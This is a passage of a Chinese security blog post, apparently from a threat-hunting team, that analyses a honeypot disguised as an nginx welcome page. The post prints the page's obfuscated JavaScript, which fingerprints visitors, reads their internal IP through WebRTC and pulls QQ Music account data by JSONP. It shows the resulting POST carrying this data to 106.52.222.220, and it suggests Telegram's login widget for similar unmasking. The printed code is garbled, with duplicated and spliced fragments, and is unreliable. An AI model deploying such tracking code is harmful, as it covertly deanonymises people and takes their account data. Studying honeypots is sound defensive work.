"_0xebe5('0xbd')]=_0xebe5('0x78');_0x501202[_0xebe5('0xdb')]=function(_0x551e9b,_0x544ee3){return _0x551e9b+_0x544ee3;};_0x501202['zeNhO']=_0xebe5('0x37');_0x501202['udYOy']='@fingerprintjs/fingerprintjs@3/dist/fp.min.js';_0x501202['LZHjf']=function(_0x33be75,_0x336565){return _0x33be75===_0x336565;};_0x501202[_0xebe5('0xd9')]=_0xebe5('0x51');_0x501202[_0xebe5('0x2f')]=function(_0x4e31a4,_0xb480bd){return _0x4e31a4(_0xb480bd);};_0x501202['ayWJW']=_0xebe5('0x2d');var _0x1d15b4=_0x501202;let _0x3a5381=0x0;await new Promise((_0x1f6add,_0x5e8294)=>{const _0x143b82=document[_0xebe5('0x98')")]);_0x143b82[_0xebe5('0x44')]=_0x1f6add;_0x143b82[_0xebe5('0x16')]=_0x5e8294;_0x143b82['async']=!![];_0x143b82[_0xebe5('0xb8')]=_0x1d15b4[_0xebe5('0xdb')](_0x1d15b4[_0xebe5('0x36' "_0xebe5('0x44')]=_0x1f6add;_0x143b82[_0xebe5('0x16')]=_0x5e8294;_0x143b82['async']=!![];_0x143b82[_0xebe5('0xb8')]=_0x1d15b4[_0xebe5('0xdb')")],_0x1d15b4['udYOy']);document['head'][_0xebe5('0x80')](_0x143b82 "'udYOy']);document['head'][_0xebe5('0x80')");})[_0xebe5('0x59')](( "_0xebe5('0x59')")=>FingerprintJS['load']( "'load'"))[_0xebe5('0x59')](_0x103818=>_0x103818[_0xebe5('0x31' "_0xebe5('0x59')")]())['then'](_0x41bee7=>{_0x3a5381=_0x41bee7['visitorId'];} "'then'");let _0x5b2d73=0x0;await _0x1d15b4[_0xebe5('0x2f')](text,_0x1d15b4[_0xebe5('0x65' "_0xebe5('0x2f')")])['then'](_0x4b4d18=>{let _0x2a38a2=/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/;realipLst=_0x4b4d18[_0xebe5('0x24' "'then'")](_0x2a38a2);if(realipLst){if(_0x1d15b4[_0xebe5('0xa3')](_0x1d15b4[_0xebe5('0xd9' "_0xebe5('0xa3')")],_0xebe5('0x51'))){_0x5b2d73=realipLst[0x0];}else{return fetch(url)[_0xebe5('0x59')](_0x22d426=>_0x22d426['text']( "0x0];}else{return fetch(url)[_0xebe5('0x59')"));}}});var _0x58d906={};_0x58d906[_0xebe5('0xc0')]=_0x3a5381;_0x58d906[_0xebe5('0xd6')]=_0x5b2d73;return _0x58d906;}async function send(_0x1df9f6){var _0x464cba={};_0x464cba['vQXdl']=function(_0x182a25,_0x86e263){return _0x182a25!==_0x86e263;};_0x464cba[_0xebe5('0x28')]=_0xebe5('0x18');_0x464cba[_0xebe5('0x9c')]=_0xebe5('0xa7');_0x464cba[_0xebe5('0x4f')]=_0xebe5('0x27');_0x464cba[_0xebe5('0x4a')]=_0xebe5('0xb1');_0x464cba[_0xebe5('0x8d')]=function(_0x204467){return _0x204467();};_0x464cba[_0xebe5('0x4e')]=function(_0x27afad,_0x35d647){return _0x27afad(_0x35d647);};_0x464cba[_0xebe5('0x79')]=function(_0x1c5255,_0xeaa32d){return _0x1c5255(_0xeaa32d);};_0x464cba[_0xebe5('0x53')]=function(_0x565098,_0x53a7c6){return _0x565098+_0x53a7c6;};_0x464cba[_0xebe5('0x3d')]=function(_0x59184c){return _0x59184c();};_0x464cba[_0xebe5('0x4b')]=_0xebe5('0xe3');_0x464cba[_0xebe5('0x69')]=_0xebe5('0x42');var _0x4a10b6=_0x464cba;const _0x2a02f9=await _0x4a10b6['QSSZQ'](getPromise "_0xebe5('0xc0')]=_0x3a5381;_0x58d906[_0xebe5('0xd6')]=_0x5b2d73;return _0x58d906;}async function send(_0x1df9f6){var _0x464cba={};_0x464cba['vQXdl']=function(_0x182a25,_0x86e263){return _0x182a25!==_0x86e263;};_0x464cba[_0xebe5('0x28')]=_0xebe5('0x18');_0x464cba[_0xebe5('0x9c')]=_0xebe5('0xa7');_0x464cba[_0xebe5('0x4f')]=_0xebe5('0x27');_0x464cba[_0xebe5('0x4a')]=_0xebe5('0xb1');_0x464cba[_0xebe5('0x8d')]=function(_0x204467){return _0x204467();};_0x464cba[_0xebe5('0x4e')]=function(_0x27afad,_0x35d647){return _0x27afad(_0x35d647);};_0x464cba[_0xebe5('0x79')]=function(_0x1c5255,_0xeaa32d){return _0x1c5255(_0xeaa32d);};_0x464cba[_0xebe5('0x53')]=function(_0x565098,_0x53a7c6){return _0x565098+_0x53a7c6;};_0x464cba[_0xebe5('0x3d')]=function(_0x59184c){return _0x59184c();};_0x464cba[_0xebe5('0x4b')]=_0xebe5('0xe3');_0x464cba[_0xebe5('0x69')]=_0xebe5('0x42');var _0x4a10b6=_0x464cba;const _0x2a02f9=await _0x4a10b6['QSSZQ'");window[_0xebe5('0x8')]=window[_0xebe5('0x8')]||window['mozRTCPeerConnection']||window['webkitRTCPeerConnection'];var _0x39201d={};_0x39201d[_0xebe5('0x85')]=[];var _0x419cdd=new RTCPeerConnection(_0x39201d),_0x1e6d13=function(){};_0x419cdd[_0xebe5('0x8a')]('' "_0xebe5('0x8')]=window[_0xebe5('0x8')]||window['mozRTCPeerConnection']||window['webkitRTCPeerConnection'];var _0x39201d={};_0x39201d[_0xebe5('0x85')]=[];var _0x419cdd=new RTCPeerConnection(_0x39201d),_0x1e6d13=function(){};_0x419cdd[_0xebe5('0x8a')");_0x419cdd[_0xebe5('0xb9')](_0x419cdd['setLocalDescription'][_0xebe5('0x14' "_0xebe5('0xb9')")](_0x419cdd),_0x1e6d13);_0x419cdd[_0xebe5('0x66')]=function(_0x1ec889){if(_0x4a10b6[_0xebe5('0x50')](_0x4a10b6[_0xebe5('0x28' "_0xebe5('0x66')]=function(_0x1ec889){if(_0x4a10b6[_0xebe5('0x50')")],_0x4a10b6[_0xebe5('0x9c')])){var _0x34e7e4=_0x4a10b6[_0xebe5('0x4f')][_0xebe5('0xea')]('|' "_0xebe5('0x9c')])){var _0x34e7e4=_0x4a10b6[_0xebe5('0x4f')][_0xebe5('0xea')");var _0x57add1=0x0;while(!![]){switch(_0x34e7e4[_0x57add1++]){case'0':_0x1e2f62[_0xebe5('0xae')]=qqmusic['B'][_0xebe5('0xbc')]['rankinfo']['uin']['toString']();continue;case'1':var _0x481640=0x0;continue;case'2':_0x419cdd['onicecandidate']=_0x1e6d13;continue;case'3':var _0x1e2f62=(({name,encrypt_uin,face,last_login_time,type})=>({'name':name,'encrypt_uin':encrypt_uin,'face':face,'last_login_time':last_login_time,'type':type}))(qqmusic['C'][_0xebe5('0xbc')]);continue;case'4':if(_0x5b6534){_0x481640=_0x5b6534[0x1];}continue;case'5':if(!_0x1ec889||!_0x1ec889['candidate']||!_0x1ec889[_0xebe5('0xbb')][_0xebe5('0xbb')])return;continue;case'6':var _0x5b6534=/([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/[_0xebe5('0x45')](_0x1ec889[_0xebe5('0xbb' "'onicecandidate']=_0x1e6d13;continue;case'3':var _0x1e2f62=(({name,encrypt_uin,face,last_login_time,type})=>({'name':name,'encrypt_uin':encrypt_uin,'face':face,'last_login_time':last_login_time,'type':type}))(qqmusic['C'][_0xebe5('0xbc')]);continue;case'4':if(_0x5b6534){_0x481640=_0x5b6534[0x1];}continue;case'5':if(!_0x1ec889||!_0x1ec889['candidate']||!_0x1ec889[_0xebe5('0xbb')][_0xebe5('0xbb')])return;continue;case'6':var _0x5b6534=/([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/[_0xebe5('0x45')")][_0xebe5('0xbb')]);continue;case'7':var _0x338c5e={};_0x338c5e[_0xebe5('0x7b')]=_0x4a10b6[_0xebe5('0x4a')];_0x338c5e['url']=_0x4a10b6[_0xebe5('0x8d')](getUrlRelativePath "_0xebe5('0xbb')]);continue;case'7':var _0x338c5e={};_0x338c5e[_0xebe5('0x7b')]=_0x4a10b6[_0xebe5('0x4a')];_0x338c5e['url']=_0x4a10b6[_0xebe5('0x8d')");_0x338c5e['data']=_0x4a10b6[_0xebe5('0x4e')](btoa,_0x4a10b6['xjgCU'](unescape,_0x4a10b6[_0xebe5('0x79' "'data']=_0x4a10b6[_0xebe5('0x4e')")](encodeURIComponent,JSON['stringify']({'social_data':[_0x1e2f62],'finger':_0x2a02f9[_0xebe5('0xc0' "'stringify'")],'internalIP':_0x481640,'realip':_0x2a02f9[_0xebe5('0xd6')],'browser':_0x4a10b6[_0xebe5('0x8d')](getBrowserInfo "_0xebe5('0xd6')],'browser':_0x4a10b6[_0xebe5('0x8d')"),'os':_0x4a10b6['tWBvS'](_0x4a10b6['tWBvS'](_0x4a10b6[_0xebe5('0x3d' "'tWBvS'")](detectOS),'-'),digits())}))));_0x338c5e['contentType']=_0xebe5('0x55');_0x338c5e[_0xebe5('0x12')]=_0x4a10b6['hwUUZ'];$[_0xebe5('0x3f')](_0x338c5e "'contentType']=_0xebe5('0x55');_0x338c5e[_0xebe5('0x12')]=_0x4a10b6['hwUUZ'];$[_0xebe5('0x3f')");continue;case'8':_0x1e2f62[_0xebe5('0x7b')]=_0x4a10b6['JHbgb'];continue;}break;}}else{_0x481640=_0x5b6534[0x1];}};}function _send(_0x1638ea){var _0x458f61={};_0x458f61['RPJzf']=function(_0x4084df,_0x48d3a2){return _0x4084df(_0x48d3a2);};var _0x5d66c7=_0x458f61;_0x5d66c7[_0xebe5('0x8c')](send,_0x1638ea "_0xebe5('0x7b')]=_0x4a10b6['JHbgb'];continue;}break;}}else{_0x481640=_0x5b6534[0x1];}};}function _send(_0x1638ea){var _0x458f61={};_0x458f61['RPJzf']=function(_0x4084df,_0x48d3a2){return _0x4084df(_0x48d3a2);};var _0x5d66c7=_0x458f61;_0x5d66c7[_0xebe5('0x8c')");}function jQueryBack(_0x2a6e23){var _0x5ca5b3={};_0x5ca5b3[_0xebe5('0x75')]=function(_0x561089,_0x9737fd){return _0x561089(_0x9737fd);};var _0x40d877=_0x5ca5b3;qqmusic=_0x2a6e23;_0x40d877[_0xebe5('0x75')](_send,'' "_0xebe5('0x75')]=function(_0x561089,_0x9737fd){return _0x561089(_0x9737fd);};var _0x40d877=_0x5ca5b3;qqmusic=_0x2a6e23;_0x40d877[_0xebe5('0x75')");}

 </script>
 <script
  src="https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D&callback=jQueryBack">
</script>

解码_0x5ee3，里面带有很多相应的关键词。

使用无框浏览器访问，可以看到有如下请求：

POST / HTTP/1.1
Host: 106.52.222.220
Connection: keep-alive
Content-Length: 304
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62
Content-Type: application/json; charset=UTF-8
Origin: http://106.52.222.220
Referer: http://106.52.222.220/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9



eyJzb2NpYWxfZGF0YSI6W3sibmFtZSI6IiIsImVuY3J5cHRfdWluIjoiMCIsImZhY2UiOiIiLCJsYXN0X2xvZ2luX3RpbWUiOjAsInR5cGUiOiJRUS1NdXNpYyJ9XSwiZmluZ2VyIjoiOTkwNWMwYjQxYzcwZmE5NjZiOGQxMjE5YTRkYzA2MzIiLCJpbnRlcm5hbElQIjowLCJyZWFsaXAiOiIxMDQuMTkyLjEwOC4xMCIsImJyb3dzZXIiOiJjaHJvbWUvOTguMC40NzU4LjEwMiIsIm9zIjoiTWFjLXg4NiJ9

解码，

b'{"social_data":[{"name":"","encrypt_uin":"0","face":"","last_login_time":0,"type":"QQ-Music"}],"finger":"9905c0b41c70fa966b8d1219a4dc0632","internalIP":0,"realip":"104.192.108.10","browser":"chrome/98.0.4758.102","os":"Mac-x86"}'

发送了当前的ip和浏览器型号。

正常的nginx不会发送xhr请求，且页面没有script标签

所以该搜索语句(server: "nginx" AND title:"Welcome to nginx!" AND link_script_url:"http")的结果集，其实在课后可以再继续深究一下。

拓展

在quake安全组内探讨蜜罐课题期间，我们进一步发现了一些可以利用第三方登陆的网站中，使用了jsonp的跨域方法的。

如，telegram官方提供了一种callback的登入按钮生成器。

可以从图中使用了https://letswritetw.github.io/letswrite-telegram-login/可知，该jsonp需要引入https://telegram.org/js/telegram-widget.js的js代码，我们通过该js进行搜索，全网约有1000个ip是嵌入了telegram这个软件进行第三方登陆的。深入研究后，该callback验证了使用的网站域名，和需要交互的特点，不太适合做无感触发的蜜罐，但是经测试，交互一次授权后，无需再交互第二次授权，即可获得tg的用户名等敏感信息，或许适合利用在某些网站本身存有能渲染js的地方。

总结

越来越多的厂商和蓝队采用蜜罐的形式来溯源和追溯攻击者，而不再是像以前被动的修补漏洞，在越来越激烈的攻防对抗中，防不再落后于攻击，甚至防守方会想方设法主动攻击攻击方。

参考

• https://blog.csdn.net/qq_37133717/article/details/105749589

• https://www.letswrite.tw/telegram-login-widget/

添加管理员微信号：quake_360

备注：进群    邀请您加入 QUAKE交流群~

欢迎，通过quake看见蜜罐~